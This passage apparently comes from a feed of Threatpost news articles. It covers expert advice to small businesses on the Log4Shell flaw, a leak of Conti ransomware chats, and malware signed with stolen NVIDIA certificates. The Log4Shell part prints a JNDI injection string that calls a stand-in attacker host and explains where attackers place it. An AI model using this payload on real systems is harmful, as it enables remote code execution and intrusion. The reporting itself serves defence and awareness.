gain in sophistication over the coming days and weeks.\n\n**Mark Nunnikhoven, distinguished cloud strategist at Lacework:** Unfortunately\u2026an attacker can take over your system or steal your data quite easily using this vulnerability.\n\n**Pieter Ockers, senior director of technical services at HackerOne: **In a more devastating case, criminals that gain initial access to the victim\u2019s environment could auction that access off to crews that specialize in executing ransomware attacks. SMBs should be hyper-aware of any of their software vendors/MSPs that use Apache log4j in case they are affected by a breach; I suspect we might hear of some ransomware attacks soon stemming from this vulnerability.\n\n## How Is a Real-World Log4Shell Attack Carried Out?\n\n**Cybereason CTO Yonatan Striem-Amit**: The most prevalent attack scenarios we\u2019ve seen are abusing things like the user agent or things like a log-in screen. If an application has a log-in page where a user is asked to put his username and password (and a lot of them do), an attacker could just supply the malicious string within that user field and get code execution on that server. After that he essentially controls logins, and therefore can start doing whatever he wants on that server, including, of course, eavesdropping into every other user who\u2019s logging in to the environment with their password.\n\n**Adam Goodman, vice president of product management at Invicti Security: **This attack is astonishingly easy to execute. This is because it may not require authentication to execute, nor would it require penetrating multiple application and/or networking layers to begin the exploit. It\u2019s simply a text string sent to any places that will be logged. And finding such a place is very easy \u2013 it can be a simple header, or a simple text field or error condition sent to a log file.\n\nTo exploit Log4Shell, the attacker may use any user input subsequently logged by the log4j framework. For example, in the case of a web application, it may be any text entry field or HTTP header such as User-Agent. Server logging is often set to log headers as well as form data.\n\nThe attacker only needs to include the following string in the logged user input:\n\n${jndi:ldap://attacker.com/executeme}\n\nWhere attacker.com is a server controlled by the attacker and executeme is the Java class to be executed on the victim server. And this is just one of many ways to exploit this vulnerability.\n\n**Lacework\u2019s Nunnikhoven: **\u201cA real world-attack can be as simple as the attack sending a specifically crafted web request to a vulnerable server. When the server processes that request, the attacker then has access to the server. The Lacework Labs team has documented this attack and some other technical aspects of attacks we\u2019ve seen in[ this blog post](<https://www.lacework.com/blog/lacework-labs-identifies-log4j-attackers/>).\u201d\n\n**Anchore\u2019s Bressers: **Attackers send requests to vulnerable applications, this triggers the vulnerability. The application then downloads a cryptocurrency mining application, in one scenario, and runs it on the compromised system. The cryptomining application then consumes large amounts of victim\u2019s processing power while the attacker claims the cryptomining rewards.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/14151922/log4j-e1639513188979.png>)\n\nTrend Micro published this attack-scenario flow on Tuesday (https://www.zerodayinitiative.com/blog/2021/12/14/the-december-2021-security-update-review).\n\n## How Can SMBs Address Log4Shell without a Dedicated Security Team?\n\n**HackerOne\u2019s Ockers: **These kinds of wide sweeping cyberattacks will always be a bigger challenge for those that lack a dedicated security team. If only one or two individuals in IT are working to monitor security, it\u2019s even more important you\u2019re prepared and have already taken stock of the software you\u2019re using and your vendor\u2019s software. Once you gain that visibility, I recommend patching any instances you find of log4j and updating the software to version 2.15.0 in your own software. I\u2019d also confirm any vendors\u2019 exposure and incident management around log4j patching and response.\n\n_According to __[Microsoft\u2019s recent blog](<https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/>)__, the log4j 2 library is included in widely deployed Apache products including Struts 2, Solr, Druid, Flink and Swift. SMBs that have built applications with these products should conduct a code audit to determine if the vulnerable version of log4j is in use._\n\n**Mitiga\u2019s Maor:** SMBs should set up an immediate task force to map all affected homegrown systems and patch them, while allowing IT to map all external systems and communicate with the censored systems.\n\n**Anchore\u2019s Bressers: **This vulnerability is going to be especially challenging for small and medium business users without a dedicated security team. Ideally software vendors are being proactive in their investigations and updates and are contacting affected customers, but this is not always the case.\n\nDepending on the level of technical acumen an organization has, there are steps that can be taken to detect and resolve the issue themselves. There are various open-source tools that exist to help detect this vulnerability on systems such as [Syft and Grype](<https://www.infoworld.com/article/3644492/how-to-detect-the-log4j-vulnerability-in-your-applications.html>). CISA has [released guidance](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>) regarding this vulnerability, including steps a business can take.\n\n**Lacework\u2019s Nunnikhoven: **\u201cWhile IT knowledge is required, the basic steps don\u2019t require a security team. IT teams should be trying to find systems that use log4j in their environment and then apply one of the techniques the fantastic team of volunteers with the log4j project have published or the recommended guidance from that system\u2019s vendors. This is a lot of work but it\u2019s necessary to reduce the risk to your business.\n\n_The log4j team\u2019s resource is __[available here](<https://logging.apache.org/log4j/2.x/security.html>), in the mitigation section under the \u201cFixed in Log4j 2.15.0\u201d heading._ _Many organizations have also published free tools to help identify vulnerable applications, [like this one](<https://about.sourcegraph.com/blog/log4j-log4shell-0-day/>), [this one](<https://log4j-tester.trendmicro.com/>) or [this one](<https://github.com/hillu/local-log4j-vuln-scanner>)._\n\n**Invicti\u2019s Adam Goodman: **It\u2019s a nightmare of a problem if you have a surplus of Java applications deployed everywhere, not just on the primary website. Organizations should immediately determine where and how they directly or indirectly use this library and then take steps to mitigate the vulnerability by either upgrading the library or modifying Java system properties to disable the vulnerable functionality.\n\nAim to ensure that all applications have limited outbound internet connectivity, and use Ansible scripts or adequate security tools to scan _en masse_ for the vulnerability before forcibly patching it. It\u2019s crucial to use security tools that target all of the applications they can find so that organizations have a more accurate window into their security posture.\n\nOrganizations that lack sufficient budget to invest in discovery tools should make a list of Java applications which they add to continually, and check them off, while prioritizing apps that present the most risk if exploited.\n\n## What Happens if an SMB Uses an MSP?\n\n**Anchore\u2019s Bressers: **I would expect an MSP to take the lead on this issue for their customers. An MSP should be monitoring their infrastructure for indicators of compromise, applying workarounds when possible, and updating the managed applications as vendor updates become available. Any business using MSP services should reach out to their provider and request a status update on the Log4Shell.\n\n**Ryan Weeks, CISO at Datto:** \u201cCyber-threats are always prevalent. Especially for small to medium-sized businesses (SMBs) \u2013 [78 percent](<https://www.datto.com/resources/dattos-2020-global-state-of-the-channel-ransomware-report>) of MSPs reported attacks against their client SMBs in the last two years alone. MSPs have a responsibility to diligently check for vulnerabilities and arm their customers with the tools to combat them. It\u2019s not enough to simply install routine software updates. SMBs need to ensure their partners proactively push out security updates for any affected products, and continually monitor for potential exploits.\n\n**Invicti\u2019s Adam Goodman: **This is an issue front-and-center in the security community and if an organization is using an MSP, it\u2019s highly likely that MSP is actively working on this. Confirm that a ticket and incident is open for this vulnerability, and ask the MSP for a list of managed applications that are under remediation. It\u2019s vital to review that list of apps for anything that\u2019s missing, including any back-office or forgotten tools in the mix. Ensure the MSP has visibility into the attack surface so that you both can better handle necessary containment steps moving forward.\n\n**Lacework\u2019s Nunnikhoven: **A managed service provider can help update and fix the systems they manage. A managed security service provider can help detect and stop attacks aimed at this issue, and help investigate any attacks that may have already taken place. The first step in both cases is speaking with your MSP/MSSP to understand the steps they are taking to help protect their customers.\n\n## What Applications Should SMBs Worry About?\n\n**Mitiga\u2019s Maor:** Impact can vary significantly as many custom-developed and off-the-shelf products are impacted. Many adversaries are using the vulnerability as part of mass-scanning efforts to identify vulnerable systems. Likewise, some known malware strains have already incorporated exploitation of this vulnerability into their spreading mechanisms. Any Java application might be affected.\n\n**Invicti\u2019s Adam Goodman: **SMBs should address worries and concerns based on business risk. Internet-facing apps should receive immediate priority, followed by applications that are critical to the software supply chain or back-office and financial applications. There is also an excellent effort from the security community to compile all affected technologies, [it can be found here](<https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592>).\u201d\n\n**ESET\u2019s L\u00e9veill\u00e9: **As a first step, SMBs should ask questions of the organization providing their internet-facing services such as their website. Then they should see if any of their applications use log4j to generate logs. Java applications and webservices would be the first to look at because log4j is a Java library.\n\n**Cybereason\u2019s Striem-Amit:** The world of Java and open source has so many dependencies, where a company might use one product, but it actually carries with it a dozen other libraries. So log4j could be present even though a company might not necessarily even be aware or \u2026 done it directly. So the scanning and the analysis is severely complex. And you have to go in each one of your servers and see, are we using log4j either directly or indirectly in that environment.\n\n## How Can SMBs Remediate a Successful Log4Shell Attack?\n\n**Mitiga\u2019s Maor:** Thankfully, there\u2019s a lot that can be done to harden environments. For customers with internally developed applications, limiting outbound internet connections from servers to only whitelisted hosts is a great step, if challenging to implement. Likewise, a variety of cybersecurity companies have listed steps that can be taken to harden vulnerable versions of log4j if upgrades can\u2019t be performed readily. Similarly, exploitation of this vulnerability and many others can be caught using typical compromise assessment techniques. It pays to threat hunt! Remediation is no different than recovering from any other type of RCE vulnerability.\n\n**Lacework\u2019s Nunnikhoven: **\u201cRemediation of this issue will depend on where you find log4j. If it\u2019s in something you\u2019ve written, you can update the library or turn off the vulnerable feature. For commercial software and services, you\u2019re reliant on the vendor to resolve the issue. While that work is ongoing, monitoring your network to attack attempts is reasonably straightforward\u2026if you have the security controls in place.\n\nLacework Labs has published[ a detailed technical post](<https://www.lacework.com/blog/lacework-labs-identifies-log4j-attackers/>) on some of the attack techniques currently in use. Expect more variants as cybercriminals develop more techniques to avoid various security controls and other mitigation.\n\nIn situations like this it\u2019s important to understand that until the root cause has been resolved (log4j updated or the feature in question turned off), attackers will continue to work to evade any mitigations that defenders put in place to stop them.\n\n**Anchore\u2019s Bressers: **An organization without an incident-management team on staff should reach out to an incident-management consulting group. There are a number of important steps that should happen when investigating any cybersecurity attack, successful or not, that can require preserving evidence, recovering data, and protecting employees and users. This is a serious vulnerability with serious consequences. It\u2019s one of the worst we have seen in recent history because of its ease of exploitability, far-reaching impacts and powerful nature.\n\n## Final Thoughts\n\n**Datto\u2019s Weeks:** Scenarios such as the log4j vulnerability underscore the importance of proactivity in security. While many are now scrambling to address the vulnerability with patches, it\u2019s equally more important to plan for subsequent attacks. Fortunately, there are solutions that can apply known workarounds for vulnerable instances.\n\n**HackerOne\u2019s Ockers: **As a best practice, I recommend all businesses have a clear understanding of the software used within their own systems. Even more important for SMBs in this instance \u2014 businesses should also have a clear understanding of the licensing agreements and security policies of any software vendors or service providers. This level of visibility lets security and IT teams quickly understand where they\u2019re at risk if, and when, something like this is exploited.\n\n**ESET\u2019s L\u00e9veill\u00e9: **SMBs should verify if there were any successful attempts to exploit the vulnerability by looking at their logs.\n\n**HackerOne\u2019s Ockers: **SMBs and larger organizations alike will be affected. As we\u2019re seeing, exploitation will continue to be widespread \u2013 this means it\u2019s particularly important that SMBs check if vendors are still using the vulnerable version of log4j to process user-controlled or otherwise untrusted data. And, if so, SMBs should also ask vendors if their data is stored or processed in the same exposed environment.\n\n**Cybereason\u2019s Striem-Amit:** I think at the end of the day, really prioritize the most internet-facing environments, and rely on your service providers as much as they can to assist you with other patching. You\u2019re welcome to use [our vaccine](<https://threatpost.com/patching-time-log4j-exploits-vaccine/177017/>) to buy time. It does work remarkably well to make sure that, between now and when you actually end up patching the server, you\u2019re kind of secure.\n\n**_There\u2019s a sea of unstructured data on the internet relating to the latest security threats. _****_[REGISTER TODAY](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_****_ to learn key concepts of natural language processing (NLP) and how to use it to navigate the data ocean and add context to cybersecurity threats (without being an expert!). This [Threatpost Town Hall](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>), sponsored by Rapid 7, features security researchers Erick Galinkin of Rapid7 and Izzy Lazerson of IntSights (a Rapid7 company), plus Threatpost journalist and webinar host, Becky Bracken._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-14T17:54:47", "type": "threatpost", "title": "What the Log4Shell Bug Means for SMBs: Experts Weigh In", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-14T17:54:47", "id": "THREATPOST:76A5549135F9D578FFC2C8FACC135193", "href": "https://threatpost.com/log4shell-bug-smbs-experts/177021/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-28T21:09:30", "description": "The Russia-Ukraine cyber warzone has split the Conti ransomware gang into warring factions, leading to a Ukrainian member spilling 60,000 of the group\u2019s internal chat messages online. \n\nOn Monday, vx-underground \u2013 an internet collection of malware source code, samples and papers that\u2019s generally considered to be a benign entity \u2013 [shared](<https://twitter.com/vxunderground/status/1498060366445613056?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1498060366445613056%7Ctwgr%5E%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Fwww.theregister.com%2F2022%2F02%2F28%2Fconti_ransomware_gang_chats_leaked%2F>) on Twitter a message from a Conti member saying that \u201cThis is a friendly heads-up that the Conti gang has just lost all their sh\u2022t.\u201d \n\nThe gang has also, apparently, lost a cache of chat data: the first dump of what the poster promised would be multiple, \u201cvery interesting\u201d leaks coming from Conti\u2019s [Jabber/XMPP](<https://en.wikipedia.org/wiki/XMPP>) server.\n\n\u201cF\u2022ck the Russian government, Glory to Ukraine!\u201d the Conti member, who\u2019s reportedly believed to be Ukrainian, proclaimed. Threatpost advises caution about clicking on any links provided in social media messages: They are, after all, provided by a ransomware group and should be treated with kid gloves.\n\n> Conti ransomware group previously put out a message siding with the Russian government. \n> \n> Today a Conti member has begun leaking data with the message \"Fuck the Russian government, Glory to Ukraine!\"\n> \n> You can download the leaked Conti data here: <https://t.co/BDzHQU5mgw> [pic.twitter.com/AL7BXnihza](<https://t.co/AL7BXnihza>)\n> \n> \u2014 vx-underground (@vxunderground) [February 27, 2022](<https://twitter.com/vxunderground/status/1498060366445613056?ref_src=twsrc%5Etfw>)\n\nCisco Talos\u2019 Azim Khodjibaev [said](<https://twitter.com/AShukuhi/status/1498066223564738565?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1498066223564738565%7Ctwgr%5E%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Fwww.theregister.com%2F2022%2F02%2F28%2Fconti_ransomware_gang_chats_leaked%2F>) on Sunday verified that the dump does in fact contain conversations between affiliates, administrators and admins, rendered on [Jabber](<https://threatpost.com/attackers-can-exploit-critical-cisco-jabber-flaw-with-one-message/158942/>) instant-messaging accounts. \n\n> looks like the [#conti](<https://twitter.com/hashtag/conti?src=hash&ref_src=twsrc%5Etfw>) leaks of 2022 are indeed chat logs from jabber accounts between affiliates, administrators and admins. Rejoice CTI analysts and data scientists, it is in json form! [#busymonday](<https://twitter.com/hashtag/busymonday?src=hash&ref_src=twsrc%5Etfw>) [pic.twitter.com/DiyqNoymsD](<https://t.co/DiyqNoymsD>)\n> \n> \u2014 Azim Khodjibaev (@AShukuhi) [February 27, 2022](<https://twitter.com/AShukuhi/status/1498066223564738565?ref_src=twsrc%5Etfw>)\n\nThe conversations date back 13 months, from Jan. 29, 2021 to yesterday, Feb. 27 2022. \n\nThe first dump contains 339 JSON files, with each file representing a full day\u2019s log. Cybersecurity firm IntelligenceX has posted the spilled conversations [here](<https://intelx.io/?did=51fbf19b-91f5-4d2d-b4e7-504477ebe916>). Many of the messages are written in a Cyrillic-scripted language that appears, at least according to Google translate, to be Russian. \n\n## The Perhaps-Less-Than-100% Russian Conti\n\nConti, a Russia-based extortionist gang, is considered to be as ruthless as it is [sophisticated](<https://threatpost.com/conti-ransomware-gang-has-full-log4shell-attack-chain/177173/>): It was the first professional-grade ransomware group to weaponize Log4j2. \n\nOn Friday, Conti sided with Russia, pledging \u201cfull support\u201d for President Vladimir Putin\u2019s invasion of Ukraine.\n\n\u201cWARNING,\u201d Conti [blared](<https://continewsnv5otx5kaoje7krkto2qbu3gtqef22mnr7eaxw3y6ncz3ad.onion.ly/>) on its blog, threatening to use its \u201cfull capacity\u201d to retaliate in the face of \u201cWestern warmongers attempt to target critical infrastructure in Russia or any Russian-speaking region of the world.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/28150130/Conti-screenshot-e1646078556143.png>)\n\nConti blog pledge to support Russia\u2019s invasion of Ukraine. Source: Conti blog.\n\n## Cyberattacks Coming at and From Russia\n\nThe split-Conti story is just one of a myriad of cybersecurity headlines coming out of the siege of Ukraine. Some other events in the cyberwar that are rocking the security world:\n\n[Russia appears to deploy digital defenses after DDoS attacks](<https://therecord.media/russia-appears-to-deploy-digital-defenses-after-ddos-attacks/>)\n\n[Anonymous Declares \u2018Cyberwar\u2019 on Russia and Pledges Support for Ukraine](<https://heimdalsecurity.com/blog/anonymous-declares-cyberwar-on-russia-and-pledges-support-for-ukraine/>)\n\n[Anonymous breached the internal network of Belarusian railways](<https://securityaffairs.co/wordpress/128486/hacktivism/anonymous-breached-belarusian-railways.html?utm_source=feedly&utm_medium=rss&utm_campaign=anonymous-breached-belarusian-railways>)\n\n[Ukraine: Volunteer IT Army is going to hit tens of Russian targets from this list](<https://securityaffairs.co/wordpress/128464/cyber-warfare-2/ukraine-volunteer-it-army-targets-russia.html?utm_source=feedly&utm_medium=rss&utm_campaign=ukraine-volunteer-it-army-targets-russia>)\n\nRichard Fleeman, vice president of penetration testing ops at cybersecurity advisory services provider Coalfire, told Threatpost on Monday that collective groups such as Anonymous claim to be hacktivists, meaning they don\u2019t attack for personal gain, but rather that they seek to spread their ideology and wage cyberwarfare against those that don\u2019t align. \n\n\u201cThese kinds of activities ebb and flow based on geopolitical events or collective objectives of these groups,\u201d he said. This isn\u2019t new, but they\u2019ll likely escalate \u201camidst the global chaos to target various countries, government agencies, and corporations.\u201d\n\n\u201cThese groups thrive on sentiment and will likely continue to build momentum based on their objectives,\u201d Fleeman observed. \n\nThe muddle of war can also obscure false flag or false information campaigns that target, influence or mislead others, he said. \u201cThis can be accomplished in a variety of ways, for example, China compromising Russian technology and targeting other nations through the compromised infrastructure to hide the origins of their attacks or embedding Russian language or terms into source code of malware would aid in the hiding [of] the true origin.\u201d\n\nHe urged that situational awareness be elevated and that security teams \u201cbe vigilant, remain alert, and leverage their security mechanisms in place to identify threats and mitigate them in a fluid manner.\u201d\n\n## The Lure of War to Cyber Actors \n\nCasey Ellis, founder and CTO at crowdsourced cybersecurity provider [Bugcrowd](<https://bugcrowd.com/>), told Threatpost on Monday that the bloodless nature of cyber combat makes it tough to predict who\u2019ll enter this conflict and how. \n\n\u201cThe fact that a lot of unrelated but concerned actors have entered the conflict is unsurprising,\u201d he noted via email. \u201cAnonymous, for example, is well-known for having a principled position on topics and then acting or retaliating via the Internet.\u201d\n\nHis primary concern: \u201cthe relative difficulty of attribution in cyberattacks, as well as the possibility of incorrect attribution or even an intentional false flag operation escalating the conflict internationally.\u201d\n\nRussia will likely avoid provoking the United States \u201cuntil it\u2019s tactically or strategically advantageous for them to do so, which we all hope we can avoid,\u201d he noted. Last week, the White House denied considering [plans](<https://threatpost.com/white-house-denies-mulling-massive-cyberattacks-against-russia/178658/>) to launch massive cyberattacks against Russia in order to cut off its ability to pursue its military aggression \u2013 denials made in spite of NBC News quoting multiple sources to the contrary. \n\n\u201cHaving said that, the backdrop of conflict and the openness of the Internet provide greater than normal levels of'\u201daircover\u2019 and background noise for cybercriminals, as well as other nation-states looking to plant a false flag,\u201d Ellis said.\n\nJohn Bambenek, principal threat hunter at digital IT and security operations company [Netenrich](<https://netenrich.com/>), told Threatpost via email that it\u2019s the wild west out there: Traditional actors are using sabotage and DDoS related to military objectives, he observed, while others \u201cwill use the fog of war (quite literally) to take advantage. No one has to commit front line infantry if they want to take advantage anymore,\u201d he said.\n\nExpect a pig pile, he predicted: \u201cUsually for conflicts in that region, other non-state regional actors will engage, either due to patriotism or opportunism. Now that more nations are developing this capability, more are coming to play. And there is no better training ground for nation-state actors than playing in an active warzone.\u201d \n\nWhat does that mean for security teams in the United States and other western countries? It depends on what the West does, he said. \u201cIf we get involved militarily, then the scope of attacks will increase to those nations as well. If it is targeted sanctions, likely attacks will focus on those in the chain of enforcement.\u201d\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-28T21:00:32", "type": "threatpost", "title": "Ukraine-Russia Cyber Warzone Splits Cyber Underground", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-28T21:00:32", "id": "THREATPOST:BDCC3D007E103708BD7CA085B29EF2CB", "href": "https://threatpost.com/ukraine-russia-cyber-warzone-splits-cyber-underground/178693/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-07T21:13:09", "description": "Two of NVIDIA\u2019s code-signing certificates were part of the Feb. 23 Lapsus$ Group ransomware attack the company suffered \u2013 certificates that are now being used to sign malware so malicious programs can slide past security safeguards on Windows machines.\n\nThe Feb. 23 attack saw 1TB of data bleed from the graphics processing units (GPUs) maker: a haul that included data on hardware schematics, firmware, drivers, email accounts and password hashes for more than 71,000 employees, and more.\n\nSecurity researchers [noted](<https://twitter.com/cyb3rops/status/1499514240008437762>) last week that malicious binaries were being signed with the stolen certificates to come off like legitimate NVIDIA programs, and that they had appeared in the malware sample database VirusTotal.\n\nThe signed binaries were detected as [Mimikatz](<https://threatpost.com/nefilim-ransomware-ghost-account/163341/>) \u2013 a tool for lateral movement that allows attackers to enumerate and view the credentials stored on the system \u2013 and for other malware and hacking tools, including [Cobalt Strike](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>) beacons, backdoors and remote access trojans (RATs) (including a [Quasar RAT](<https://threatpost.com/chinese-spy-group-malware-loaders/145093/>) [[VirusTotal](<https://www.virustotal.com/gui/file/065077fa74c211adf9563f00e57b5daf9594e72cea15b1c470d41b756c3b87e1>)] and a Windows driver [[VirusTotal](<https://www.virustotal.com/gui/file/2f578cb0d97498b3482876c2f356035e3365e2c492e10513ff4e4159eebc44b8/detection>)]).\n\n> Gist that contains [@virustotal](<https://twitter.com/virustotal?ref_src=twsrc%5Etfw>) Enterprise search queries to find samples signed with the leaked NVIDIA certificates[#NvidiaLeaks](<https://twitter.com/hashtag/NvidiaLeaks?src=hash&ref_src=twsrc%5Etfw>) [#LAPSUS](<https://twitter.com/hashtag/LAPSUS?src=hash&ref_src=twsrc%5Etfw>)\n> \n> based on my and [@GossiTheDog](<https://twitter.com/GossiTheDog?ref_src=twsrc%5Etfw>)'s work \n<https://t.co/JxnbrLSjVz> [pic.twitter.com/KYRKdYcF8R](<https://t.co/KYRKdYcF8R>)\n> \n> \u2014 Florian Roth \u26a1\ufe0f (@cyb3rops) [March 5, 2022](<https://twitter.com/cyb3rops/status/1500091665595387909?ref_src=twsrc%5Etfw>)\n\n## Expired But Still Recognized Certs: A \u2018Significant Threat\u2019\n\nBoth of the stolen NVIDIA code-signing certificates are expired, but they\u2019re still recognized by Windows, which allow a driver signed with the certificates to be loaded in the operating system, according to [reports](<https://www.bleepingcomputer.com/news/security/malware-now-using-nvidias-stolen-code-signing-certificates/>).\n\nAccording to security researchers [Kevin Beaumont](<https://twitter.com/GossiTheDog>) and [Will Dormann](<https://twitter.com/wdormann>), the stolen certificates use these serial numbers:\n\n * 43BB437D609866286DD839E1D00309F5\n * 14781bc862e8dc503a559346f5dcc518\n\nCasey Bisson, head of product and developer relations at code-security product provider BluBracket, called the certificate theft a \u201csignificant threat.\u201d\n\n\u201cSigning certificates are the keys computers use to verify trust in software,\u201d he told Threatpost via email on Monday. \u201cValidating code signatures is a critical step in securing the global code supply chain, and it protects everybody from average consumers running Windows Updates (where signatures are validated automatically) to developers using software components in larger projects (where signatures are hopefully checked as part of the CI process).\u201d\n\nMike Parkin, senior technical engineer at enterprise cyber risk remediation provider Vulcan Cyber, agreed that malware authors being able to use legitimate certificates to sign their code \u201ccan have far -reaching consequences.\n\nThe dire situation is somewhat mitigated due to the stolen certificates having expired, he said in an email on Monday, but that\u2019s not a perfect solution. \u201cThis will make it easier for anti-malware applications to identify malicious code signed with these certs, but there is still the challenge of Microsoft\u2019s operating systems accepting them as valid even past their expiration,\u201d he said.\n\n## Supply Chain\n\nBisson noted that given NVIDIA\u2019s massive install base \u2013 its technology shows up everywhere from gaming to crypto miners to industrial and scientific super-computing \u2013 a supply chain attack targeting users could have \u201cenormous implications.\u201d\n\nHe pointed to global power consumption as one yardstick of how NVIDIA\u2019s hardware is slathered across the world: \u201cSome estimates peg crypto as consuming over half a percent of the world\u2019s annual electric generation on its own,\u201d he said, \u201cmost of that related to power-hungry Nvidia processors dependent on Nvidia\u2019s software signed by these keys.\u201d\n\nNVIDIA\u2019s hardware is critical for gaming and media production, as well as cloud-based artificial intelligence (AI) and machine-learning (ML) that powers everything from voice assistants, image and video processing (including automated moderation), and manufacturing quality control systems, Bisson pointed out.\n\nHe suggested that the fix for supply-chain threats is to establish a new chain of trust in NVIDIA\u2019s software development workflow with new certificates. \u201cUpstream certificate authorities can revoke Nvidia\u2019s old certificates to block installation of any potentially compromised software with those certificates,\u201d he explained. \u201cAs always, intrusion detection and access control audits are critical to preventing new intrusion attacks, while enforcing signed commits and continuous automated code scanning for secrets, dependency vulnerabilities, along with manual testing are solid steps to ensuring the security of their software.\u201d\n\n## How to Block the Signed Malware\n\nDavid Weston, director of enterprise and OS security at Microsoft, [tweeted](<https://twitter.com/dwizzzleMSFT/status/1499527802382471188?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1499527802382471188%7Ctwgr%5E%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Fwww.bleepingcomputer.com%2Fnews%2Fsecurity%2Fmalware-now-using-nvidias-stolen-code-signing-certificates%2F>) on Thursday that admins can keep Windows from loading known, vulnerable drivers by configuring [Windows Defender Application Control policies](<https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/select-types-of-rules-to-create>) to control which of NVIDIA\u2019s drivers can be loaded.\n\nThat should, in fact, be admins\u2019 first choice, he wrote.\n\n> WDAC policies work on both 10-11 with no hardware requirements down to the home SKU despite some FUD misinformation i have seen so it should be your first choice. Create a policy with the Wizard and then add a deny rule or allow specific versions of Nvidia if you need\n> \n> \u2014 David Weston (DWIZZZLE) (@dwizzzleMSFT) [March 3, 2022](<https://twitter.com/dwizzzleMSFT/status/1499527802382471188?ref_src=twsrc%5Etfw>)\n\nDavid Weston, Microsoft vice president for OS Security and Enterprise, went on to [tweet](<https://twitter.com/dwizzzleMSFT/status/1499528020410781710>) the attributes to be blocked or allowed.\n\n> These are all the attributes you can block or allow on: [pic.twitter.com/3BV3QoMuMX](<https://t.co/3BV3QoMuMX>)\n> \n> \u2014 David Weston (DWIZZZLE) (@dwizzzleMSFT) [March 3, 2022](<https://twitter.com/dwizzzleMSFT/status/1499528020410781710?ref_src=twsrc%5Etfw>)\n\nUnfortunately, Microsoft\u2019s WDAC fix isn\u2019t a practical solution for the majority of Windows users, who aren\u2019t technically literate, Vulcan Cyber\u2019s Parkin pointed out.\n\nA better approach would be for Microsoft to recognize the certificates as expired and no longer accept them as legitimate, he told Threatpost.\n\n## Doxxed Emails, Password Hashes & More\n\nOn Feb. 27, Lapsus$ claimed that it had been in NVIDIA\u2019s systems for a week, that the gang isn\u2019t state-sponsored and that it\u2019s \u201cnot into politics AT ALL\u201d \u2013 a clarification that\u2019s apparently important for cybercrooks now that the Russia/Ukraine [cyber war zone](<https://threatpost.com/ukraine-russia-cyber-warzone-splits-cyber-underground/178693/>) is burning at fever pitch.\n\nLast Wednesday, March 2, the compromised-email notice site Have I Been Pwned put up an [alert](<https://haveibeenpwned.com/PwnedWebsites#NVIDIA>) regarding 71,335 NVIDIA employees\u2019 emails and NTLM password hashes having been leaked on Feb. 23, \u201cmany of which were subsequently cracked and circulated within the hacking community.\u201d\n\nAs has been [noted](<https://www.theverge.com/2022/3/4/22962217/nvidia-hack-lapsus-have-i-been-pwned-email-breach-password>), at least on the face of it, that number of 71,000 compromised employee accounts \u2013 a number that the graphics processing units maker hasn\u2019t confirmed or denied \u2013 doesn\u2019t make sense. In its most recent quarterly report ([PDF](<https://s22.q4cdn.com/364334381/files/doc_downloads/2021/04/2021-Annual-Review.pdf>)), NVIDIA only listed a workforce of 18,975.\n\nBut, given that the Telegraph\u2019s initial 